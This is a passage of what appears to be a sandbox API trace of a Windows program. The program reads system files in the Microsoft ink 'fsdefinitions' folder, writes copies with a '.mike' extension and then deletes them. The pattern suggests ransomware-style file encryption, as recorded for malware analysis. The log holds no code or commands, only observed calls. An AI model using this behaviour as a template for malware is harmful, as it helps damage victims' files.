lpOldMode=0x2aefa8) returned 1 [0045.963] GetFileType (hFile=0x264) returned 0x1 [0045.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.963] WriteFile (in: hFile=0x264, lpBuffer=0x220b7f4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x220b7f4*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.964] CloseHandle (hObject=0x264) returned 1 [0045.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.965] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), fInfoLevelId=0x0, lpFileInformation=0x220b2d0 | out: lpFileInformation=0x220b2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9)) returned 1 [0045.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.965] GetFileType (hFile=0x264) returned 0x1 [0045.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.965] GetFileType (hFile=0x264) returned 0x1 [0045.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.965] ReadFile (in: hFile=0x264, lpBuffer=0x220c928, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x220c928*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0045.967] CloseHandle (hObject=0x264) returned 1 [0045.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.968] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.968] GetFileType (hFile=0x264) returned 0x1 [0045.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.968] GetFileType (hFile=0x264) returned 0x1 [0045.968] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.968] WriteFile (in: hFile=0x264, lpBuffer=0x2216e90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x2216e90*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0045.968] CloseHandle (hObject=0x264) returned 1 [0045.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.969] GetFileType (hFile=0x264) returned 0x1 [0045.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.969] GetFileType (hFile=0x264) returned 0x1 [0045.969] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x2800 [0045.969] ReadFile (in: hFile=0x264, lpBuffer=0x2219904, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2219904*, lpNumberOfBytesRead=0x2af038*=0x12f9, lpOverlapped=0x0) returned 1 [0045.969] CloseHandle (hObject=0x264) returned 1 [0045.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.970] GetFileType (hFile=0x264) returned 0x1 [0045.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.970] GetFileType (hFile=0x264) returned 0x1 [0045.970] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0045.970] WriteFile (in: hFile=0x264, lpBuffer=0x2222558*, nNumberOfBytesToWrite=0x1300, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x2222558*, lpNumberOfBytesWritten=0x2af04c*=0x1300, lpOverlapped=0x0) returned 1 [0045.971] CloseHandle (hObject=0x264) returned 1 [0045.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.971] GetFileType (hFile=0x264) returned 0x1 [0045.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.972] GetFileType (hFile=0x264) returned 0x1 [0045.972] WriteFile (in: hFile=0x264, lpBuffer=0x2225bd0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2225bd0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.973] CloseHandle (hObject=0x264) returned 1 [0045.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.973] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59a32c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe59a32c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe59a32c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d20)) returned 1 [0045.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.974] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22273c4 | out: lpFileInformation=0x22273c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59a32c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe59a32c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe59a32c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d20)) returned 1 [0045.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", dwFileAttributes=0x80) returned 0 [0045.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike", lpFilePart=0x0) returned 0x54 [0045.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.975] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59a32c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe59a32c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe59a32c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d20)) returned 1 [0045.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike", lpFilePart=0x0) returned 0x54 [0045.975] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike")) returned 1 [0045.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0045.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0045.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0045.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.024] GetFileType (hFile=0x264) returned 0x1 [0046.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.024] GetFileType (hFile=0x264) returned 0x1 [0046.024] CloseHandle (hObject=0x264) returned 1 [0046.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.024] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.025] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), fInfoLevelId=0x0, lpFileInformation=0x2229604 | out: lpFileInformation=0x2229604*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b)) returned 1 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.025] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), fInfoLevelId=0x0, lpFileInformation=0x222995c | out: lpFileInformation=0x222995c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b)) returned 1 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.025] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.026] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.026] GetFileType (hFile=0x264) returned 0x1 [0046.026] GetFileType (hFile=0x264) returned 0x1 [0046.026] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.026] WriteFile (in: hFile=0x264, lpBuffer=0x222a978*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x222a978*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.027] CloseHandle (hObject=0x264) returned 1 [0046.027] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), fInfoLevelId=0x0, lpFileInformation=0x222a418 | out: lpFileInformation=0x222a418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b)) returned 1 [0046.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.028] GetFileType (hFile=0x264) returned 0x1 [0046.028] GetFileType (hFile=0x264) returned 0x1 [0046.028] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.028] ReadFile (in: hFile=0x264, lpBuffer=0x222bac4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x222bac4*, lpNumberOfBytesRead=0x2af038*=0x264b, lpOverlapped=0x0) returned 1 [0046.029] CloseHandle (hObject=0x264) returned 1 [0046.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.030] GetFileType (hFile=0x264) returned 0x1 [0046.030] GetFileType (hFile=0x264) returned 0x1 [0046.030] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.030] WriteFile (in: hFile=0x264, lpBuffer=0x223a7a8*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x223a7a8*, lpNumberOfBytesWritten=0x2af04c*=0x2650, lpOverlapped=0x0) returned 1 [0046.030] CloseHandle (hObject=0x264) returned 1 [0046.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.032] GetFileType (hFile=0x264) returned 0x1 [0046.032] GetFileType (hFile=0x264) returned 0x1 [0046.033] WriteFile (in: hFile=0x264, lpBuffer=0x223f1a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x223f1a0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.033] CloseHandle (hObject=0x264) returned 1 [0046.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.034] 